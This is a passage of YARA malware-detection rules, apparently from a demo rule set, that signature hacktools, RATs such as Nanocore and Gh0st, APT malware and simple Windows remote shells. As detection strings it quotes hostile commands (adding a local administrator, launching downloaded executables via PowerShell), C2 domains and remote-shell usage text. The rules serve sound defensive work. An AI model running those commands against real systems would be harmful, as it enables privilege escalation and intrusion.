+      description = "Semiautomatically generated YARA rule - file GetUserSPNs.vbs"
+      author = "Florian Roth"
+      reference = "https://github.com/skelsec/PyKerberoast"
+      date = "2016-05-21 09:51:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8dcb568d475fd8a0557e70ca88a262b7c06d0f42835c855b52e059c0f5ce9237"
+      tags = "DEMO, HKTL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Wscript.Echo \"User Logon: \" & oRecordset.Fields(\"samAccountName\")" fullword ascii
+      $s2 = "Wscript.Echo \" USAGE:        \" & WScript.ScriptName & \" SpnToFind [GC Servername or Forestname]\"" fullword ascii
+      $s3 = "strADOQuery = \"<\" + strGCPath + \">;(&(!objectClass=computer)(servicePrincipalName=*));\" & _" fullword ascii
+   condition: 
+      2 of them
+}
+
+rule GetUserSPNs_PS1_RID2C67 : DEMO HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file GetUserSPNs.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/skelsec/PyKerberoast"
+      date = "2016-05-21 09:47:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1b69206b8d93ac86fe364178011723f4b1544fff7eb1ea544ab8912c436ddc04"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()" fullword ascii
+      $s2 = "@{Name=\"PasswordLastSet\";      Expression={[datetime]::fromFileTime($result.Properties[\"pwdlastset\"][0])} } #, `" fullword ascii
+      $s3 = "Write-Host \"No Global Catalogs Found!\"" fullword ascii
+      $s4 = "$searcher.PropertiesToLoad.Add(\"pwdlastset\") | Out-Null" fullword ascii
+   condition: 
+      2 of them
+}
+
+rule kerberoast_PY_RID2C4B : DEMO HKTL SCRIPT T1208 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file kerberoast.py"
+      author = "Florian Roth"
+      reference = "https://github.com/skelsec/PyKerberoast"
+      date = "2016-05-21 09:43:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "73155949b4344db2ae511ec8cab85da1ccbf2dfec3607fb9acdc281357cdf380"
+      tags = "DEMO, HKTL, SCRIPT, T1208"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)" fullword ascii
+      $s2 = "key = kerberos.ntlmhash(args.password)" fullword ascii
+      $s3 = "help='the password used to decrypt/encrypt the ticket')" fullword ascii
+      $s4 = "newencserverticket = kerberos.encrypt(key, 2, e, nonce)" fullword ascii
+   condition: 
+      2 of them
+}
+
+rule ONHAT_Proxy_Hacktool_RID2EA0 : APT CHINA DEMO EXE FILE HKTL T1020 T1090 {
+   meta:
+      description = "Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups"
+      author = "Florian Roth"
+      reference = "https://goo.gl/p32Ozf"
+      date = "2016-05-12 11:22:31"
+      score = 100
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "30b2de0a802a65b4db3a14593126301e6949c1249e68056158b2cc74798bac97"
+      hash2 = "94bda24559713c7b8be91368c5016fc7679121fea5d565d3d11b2bb5d5529340"
+      hash3 = "a26e75fec3b9f7d5a1c3d0ce1e89e4b0befb7a601da0c69a4cf96301921771dd"
+      tags = "APT, CHINA, DEMO, EXE, FILE, HKTL, T1020, T1090"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "INVALID PARAMETERS. TYPE ONHAT.EXE -h FOR HELP INFORMATION." fullword ascii
+      $s2 = "[ONHAT] LISTENS (S, %d.%d.%d.%d, %d) ERROR." fullword ascii
+      $s3 = "[ONHAT] CONNECTS (T, %d.%d.%d.%d, %d.%d.%d.%d, %d) ERROR." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and ( 1 of ( $s* ) ) ) or ( 2 of them )
+}
+
+rule BeepService_Hacktool_RID2EF2 : APT CHINA DEMO EXE FILE HKTL T1077 {
+   meta:
+      description = "Detects BeepService Hacktool used by Chinese APT groups"
+      author = "Florian Roth"
+      reference = "https://goo.gl/p32Ozf"
+      date = "2016-05-12 11:36:11"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "032df812a68852b6f3822b9eac4435e531ca85bdaf3ee99c669134bd16e72820"
+      hash2 = "e30933fcfc9c2a7443ee2f23a3df837ca97ea5653da78f782e2884e5a7b734f7"
+      hash3 = "ebb9c4f7058e19b006450b8162910598be90428998df149977669e61a0b7b9ed"
+      tags = "APT, CHINA, DEMO, EXE, FILE, HKTL, T1077"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\\\%s\\admin$\\system32\\%s" fullword ascii
+      $s1 = "123.exe" fullword ascii
+      $s2 = "regclean.exe" fullword ascii
+      $s3 = "192.168.88.69" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and $x1 and 1 of ( $s* )
+}
+
+rule GhostDragon_Gh0stRAT_Sample2_RID3170 : CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/the-ghost-dragon"
+      date = "2016-04-23 13:22:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "71a52058f6b5cef66302c19169f67cf304507b4454cca83e2c36151da8da1d97"
+      tags = "CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "AdobeWpk" fullword ascii
+      $x2 = "seekin.dll" fullword ascii
+      $c1 = "Windows NT 6.1; Trident/6.0)" fullword ascii
+      $c2 = "Mozilla/5.0 (compatible; MSIE 10.0; " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and ( all of ( $x* ) or all of ( $c* ) ) ) or ( all of them )
+}
+
+rule GhostDragon_Gh0stRAT_Sample3_RID3171 : CHINA DEMO MAL {
+   meta:
+      description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/the-ghost-dragon"
+      date = "2016-04-23 13:22:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1be9c68b31247357328596a388010c9cfffadcb6e9841fb22de8b0dc2d161c42"
+      tags = "CHINA, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 44 24 15 65 88 54 24 16 c6 44 24 } 
+      $op2 = { 44 24 1b 43 c6 44 24 1c 75 88 54 24 1e } 
+      $op3 = { 1e 79 c6 44 24 1f 43 c6 44 24 20 75 88 54 24 22 } 
+   condition: 
+      all of them
+}
+
+rule PoisonIvy_RAT_ssMUIDLL_RID2F13 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects PoisonIvy RAT DLL mentioned in Palo Alto Blog in April 2016"
+      author = "Florian Roth"
+      reference = "http://goo.gl/WiwtYT"
+      date = "2016-04-22 11:41:41"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a424ad3f3106b87e8e82c7125834d7d8af8730a2a97485a639928f66d5f6bf4"
+      hash2 = "6eb7657603edb2b75ed01c004d88087abe24df9527b272605b8517a423557fe6"
+      hash3 = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ssMUIDLL.dll" fullword ascii
+      $op1 = { 6a 00 c6 07 e9 ff d6 } 
+      $op2 = { 02 cb 6a 00 88 0f ff d6 47 ff 4d fc 75 } 
+      $op3 = { 6a 00 88 7f 02 ff d6 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and ( all of ( $op* ) ) ) or ( all of them )
+}
+
+rule Nanocore_RAT_Gen_1_RID2D95 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Detetcs the Nanocore RAT and similar malware"
+      author = "Florian Roth"
+      reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+      date = "2016-04-22 10:38:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii
+      $x2 = "RunPE1" fullword ascii
+      $x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii
+      $x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii
+      $x5 = "Monitorinjection" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them )
+}
+
+rule Nanocore_RAT_Gen_2_RID2D96 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Detetcs the Nanocore RAT"
+      author = "Florian Roth"
+      reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+      date = "2016-04-22 10:38:11"
+      score = 100
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "NanoCore.ClientPluginHost" fullword ascii
+      $x2 = "IClientNetworkHost" fullword ascii
+      $x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them )
+}
+
+rule Nanocore_RAT_Sample_1_RID2EDD : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detetcs a certain Nanocore RAT sample"
+      author = "Florian Roth"
+      reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
+      date = "2016-04-22 11:32:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide
+      $x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii
+      $x3 = "popthatkitty.Resources.resources" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) ) ) or ( all of them )
+}
+
+rule Metasploit_Loader_RSMudge_RID30DF : DEMO EXE FILE METASPLOIT SUSP {
+   meta:
+      description = "Detects a Metasploit Loader by RSMudge - file loader.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/rsmudge/metasploit-loader"
+      date = "2016-04-20 12:58:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "afe34bfe2215b048915b1d55324f1679d598a0741123bc24274d4edc6e395a8d"
+      tags = "DEMO, EXE, FILE, METASPLOIT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Could not resolve target" fullword ascii
+      $s2 = "Could not connect to target" fullword ascii
+      $s3 = "%s [host] [port]" fullword ascii
+      $s4 = "ws2_32.dll is out of date." fullword ascii
+      $s5 = "read a strange or incomplete length value" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 3 of ( $s* ) ) ) or ( all of them )
+}
+
+rule APT6_Malware_Sample_Gen_RID2F8E : DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Rule written for 2 malware samples that communicated to APT6 C2 servers"
+      author = "Florian Roth"
+      reference = "https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/"
+      date = "2016-04-09 12:02:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      type = "file"
+      hash1 = "321ec239bfa6927d39155ef5f10741ed786219489bbbb1dc8fee66e22f9f8e80"
+      hash2 = "7aef130b19d1f940e4c4cee6efe0f190f1402d2e0f741ee605c77518a04cb6d7"
+      tags = "DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x2 = "SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>!" fullword ascii
+      $x3 = "636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146" fullword ascii
+      $s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
+      $s2 = "DUMPTHIN" fullword ascii
+      $s3 = "\"C:\\WINDOWS\\system32\\" ascii
+      $s4 = "window.eval(f.decodeURIComponent(a));" fullword ascii
+      $s5 = "/tbedrs.dll" fullword ascii
+      $s6 = "NSISDL/1.2 (Mozilla)" fullword ascii
+      $s7 = "NSIS_Inetc (Mozilla)" fullword ascii
+      $s8 = "/logos.gif" fullword ascii
+      $s9 = "synflood" fullword ascii
+      $s10 = "IconFile=C:\\WINDOWS\\system32\\SHELL32.dll" fullword ascii
+      $s11 = "udpflood" fullword ascii
+      $s12 = "shellcode" fullword ascii
+      $s13 = "&PassWord=" fullword ascii
+      $s14 = "SystemPropertiesProtection.exe" fullword ascii
+      $s15 = "SystemPropertiesRemote.exe" fullword ascii
+      $c1 = "jobcall.org" ascii
+      $c2 = "sportsinfinite.com" ascii
+      $c3 = "milsatcom.us" ascii
+      $c4 = "geographicphotographer.com" ascii
+      $c5 = "snowsmooth.com" ascii
+      $c6 = "goodre.net" ascii
+      $c7 = "gloflabs.com" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 1 of ( $c* ) ) ) or ( 6 of them )
+}
+
+rule Linux_Portscan_Shark_1_RID2FB2 : DEMO FILE HKTL LINUX T1046 {
+   meta:
+      description = "Detects Linux Port Scanner Shark"
+      author = "Florian Roth"
+      reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
+      date = "2016-04-01 12:08:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4da0e535c36c0c52eaa66a5df6e070c52e7ddba13816efc3da5691ea2ec06c18"
+      hash2 = "e395ca5f932419a4e6c598cae46f17b56eb7541929cdfb67ef347d9ec814dea3"
+      tags = "DEMO, FILE, HKTL, LINUX, T1046"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "rm -rf scan.log session.txt" fullword ascii
+      $s17 = "*** buffer overflow detected ***: %s terminated" fullword ascii
+      $s18 = "*** stack smashing detected ***: %s terminated" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7362 and all of them )
+}
+
+rule Linux_Portscan_Shark_2_RID2FB3 : DEMO HKTL LINUX T1046 {
+   meta:
+      description = "Detects Linux Port Scanner Shark"
+      author = "Florian Roth"
+      reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
+      date = "2016-04-01 12:08:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5f80bd2db608a47e26290f3385eeb5bfc939d63ba643f06c4156704614def986"
+      hash2 = "90af44cbb1c8a637feda1889d301d82fff7a93b0c1a09534909458a64d8d8558"
+      tags = "DEMO, HKTL, LINUX, T1046"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "usage: %s <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port>" fullword ascii
+      $s2 = "Difference between server modulus and host modulus is only %d. It's illegal and may not work" fullword ascii
+      $s3 = "rm -rf scan.log" fullword ascii
+   condition: 
+      all of them
+}
+
+rule TempRacer_RID2A94 : DEMO EXE FILE HKTL T1068 T1087 {
+   meta:
+      description = "Detects privilege escalation tool - file TempRacer_RID2A94.exe"
+      author = "Florian Roth"
+      reference = "http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/"
+      date = "2016-03-30 06:58:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, HKTL, T1068, T1087"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\obj\\Release\\TempRacer_RID2A94.pdb" ascii
+      $s2 = "[+] Injecting into " fullword wide
+      $s3 = "net localgroup administrators alex /add" fullword wide
+      $s4 = "[+] File: {0} renamed to {1}" fullword wide
+      $s5 = "[+] Blocking " fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 25KB and 1 of them ) or ( 4 of them )
+}
+
+rule FourElementSword_Config_File_RID321A : DEMO MAL {
+   meta:
+      description = "Detects FourElementSword Malware"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2016-03-26 13:50:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "01,,hccutils.dll,2" fullword ascii
+      $s1 = "RegisterDlls=OurDll" fullword ascii
+      $s2 = "[OurDll]" fullword ascii
+      $s3 = "[DefaultInstall]" fullword ascii
+      $s4 = "Signature=\"$Windows NT$\"" fullword ascii
+   condition: 
+      4 of them
+}
+
+rule FourElementSword_ElevateDLL_2_RID3218 : DEMO EXE FILE MAL T1082 {
+   meta:
+      description = "Detects FourElementSword Malware"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2016-03-26 13:50:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL, T1082"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Elevate.dll" fullword ascii
+      $s2 = "GetSomeF" fullword ascii
+      $s3 = "GetNativeSystemInfo" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 25KB and $s1 ) or ( all of them )
+}
+
+rule FourElementSword_fslapi_dll_gui_RID33A3 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects FourElementSword Malware"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2016-03-26 14:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "fslapi.dll.gui" fullword wide
+      $s2 = "ImmGetDefaultIMEWnd" fullword ascii
+      $s3 = "RichOX" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 12KB and all of them )
+}
+
+rule FourElementSword_PowerShell_Start_RID3457 : DEMO MAL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects FourElementSword Malware"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2016-03-26 15:26:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "start /min powershell C:\\\\ProgramData\\\\wget.exe" ascii
+      $s1 = "start /min powershell C:\\\\ProgramData\\\\iuso.exe" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule ProjectM_DarkComet_1_RID2E9E : DEMO EXE FILE G0134 MAL {
+   meta:
+      description = "Detects ProjectM Malware"
+      author = "Florian Roth"
+      reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
+      date = "2016-03-26 11:22:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, G0134, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "DarkO\\_2" fullword ascii
+      $a1 = "AVICAP32.DLL" fullword ascii
+      $a2 = "IDispatch4" fullword ascii
+      $a3 = "FLOOD/" fullword ascii
+      $a4 = "T<-/HTTP://" fullword ascii
+      $a5 = "infoes" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 4 of them ) or ( all of them )
+}
+
+rule ProjectM_CrimsonDownloader_RID317E : DEMO EXE FILE G0134 MAL {
+   meta:
+      description = "Detects ProjectM Malware"
+      author = "Florian Roth"
+      reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
+      date = "2016-03-26 13:24:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, G0134, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "E:\\Projects\\m_project\\main\\mj shoaib" 
+      $s1 = "\\obj\\x86\\Debug\\secure_scan.pdb" ascii
+      $s2 = "secure_scan.exe" fullword wide
+      $s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|mswall" fullword wide
+      $s4 = "secure_scan|mswall" fullword wide
+      $s5 = "[Microsoft-Security-Essentials]" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and $x1 ) or ( all of them )
+}
+
+rule FourElementSword_T9000_RID2F02 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects FourElementSword Malware"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2016-03-26 11:38:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "D:\\WORK\\T9000\\" ascii
+      $x2 = "%s\\temp\\HHHH.dat" fullword wide
+      $s1 = "Elevate.dll" fullword wide
+      $s2 = "ResN32.dll" fullword wide
+      $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword wide
+      $s4 = "igfxtray.exe" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( all of them )
+}
+
+rule FourElementSword_Keyainst_EXE_RID326E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects FourElementSword Malware"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2016-03-26 14:04:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\ProgramData\\Keyainst.exe" fullword ascii
+      $s1 = "ShellExecuteA" fullword ascii
+      $s2 = "GetStartupInfoA" fullword ascii
+      $s3 = "SHELL32.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 48KB and $x1 ) or ( all of them )
+}
+
+rule FourElementSword_ElevateDLL_RID3187 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects FourElementSword Malware"
+      author = "Florian Roth"
+      reference = "not set"
+      date = "2016-03-26 13:26:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9"
+      hash2 = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Elevate.dll" fullword wide
+      $x2 = "ResN32.dll" fullword wide
+      $s1 = "Kingsoft\\Antivirus" fullword wide
+      $s2 = "KasperskyLab\\protected" fullword wide
+      $s3 = "Sophos" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) and all of ( $s* ) ) or ( all of them )
+}
+
+rule WindowsShell_s3_RID2CF9 : DEMO EXE FILE MAL SCRIPT {
+   meta:
+      description = "Detects simple Windows shell - file s3.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/odzhan/shells/"
+      date = "2016-03-26 10:12:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd                  - execute cmd.exe" fullword ascii
+      $s2 = "\\\\.\\pipe\\%08X" fullword ascii
+      $s3 = "get <remote> <local> - download file" fullword ascii
+      $s4 = "[ simple remote shell for windows v3" fullword ascii
+      $s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+      $s6 = "put <local> <remote> - upload file" fullword ascii
+      $s7 = "term                 - terminate remote client" fullword ascii
+      $s8 = "[ downloading \"%s\" to \"%s\"" fullword ascii
+      $s9 = "-l           Listen for incoming connections" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
+}
+
+rule WindosShell_s1_RID2C80 : DEMO EXE FILE MAL SCRIPT {
+   meta:
+      description = "Detects simple Windows shell - file s1.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/odzhan/shells/"
+      date = "2016-03-26 09:51:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[ executing cmd.exe" fullword ascii
+      $s2 = "[ simple remote shell for windows v1" fullword ascii
+      $s3 = "-p <number>  Port number to use (default is 443)" fullword ascii
+      $s4 = "usage: s1 <address> [options]" fullword ascii
+      $s5 = "[ waiting for connections on %s" fullword ascii
+      $s6 = "-l           Listen for incoming connections" fullword ascii
+      $s7 = "[ connection from %s" fullword ascii
+      $s8 = "[ %c%c requires parameter" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
+}
+
+rule WindowsShell_s4_RID2CFA : DEMO EXE FILE MAL SCRIPT {
+   meta:
+      description = "Detects simple Windows shell - file s4.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/odzhan/shells/"
+      date = "2016-03-26 10:12:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd                  - execute cmd.exe" fullword ascii
+      $s2 = "\\\\.\\pipe\\%08X" fullword ascii
+      $s3 = "get <remote> <local> - download file" fullword ascii
+      $s4 = "[ simple remote shell for windows v4" fullword ascii
+      $s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+      $s6 = "[ downloading \"%s\" to \"%s\"" fullword ascii
+      $s7 = "[ uploading \"%s\" to \"%s\"" fullword ascii
+      $s8 = "-l           Listen for incoming connections" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
+}
+
+rule WindowsShell_Gen_RID2D6D : DEMO EXE FILE GEN MAL SCRIPT {
+   meta:
+      description = "Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/odzhan/shells/"
+      date = "2016-03-26 10:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a7c3d85eabac01e7a7ec914477ea9f17e3020b3b2f8584a46a98eb6a2a7611c5"
+      hash2 = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
+      hash3 = "df0693caae2e5914e63e9ee1a14c1e9506f13060faed67db5797c9e61f3907f0"
+      tags = "DEMO, EXE, FILE, GEN, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "[ %c%c requires parameter" fullword ascii
+      $s1 = "[ %s : %i" fullword ascii
+      $s2 = "[ %s : %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( all of them )
+}
+
+rule WindowsShell_Gen2_RID2D9F : DEMO EXE FILE MAL SCRIPT {
+   meta:
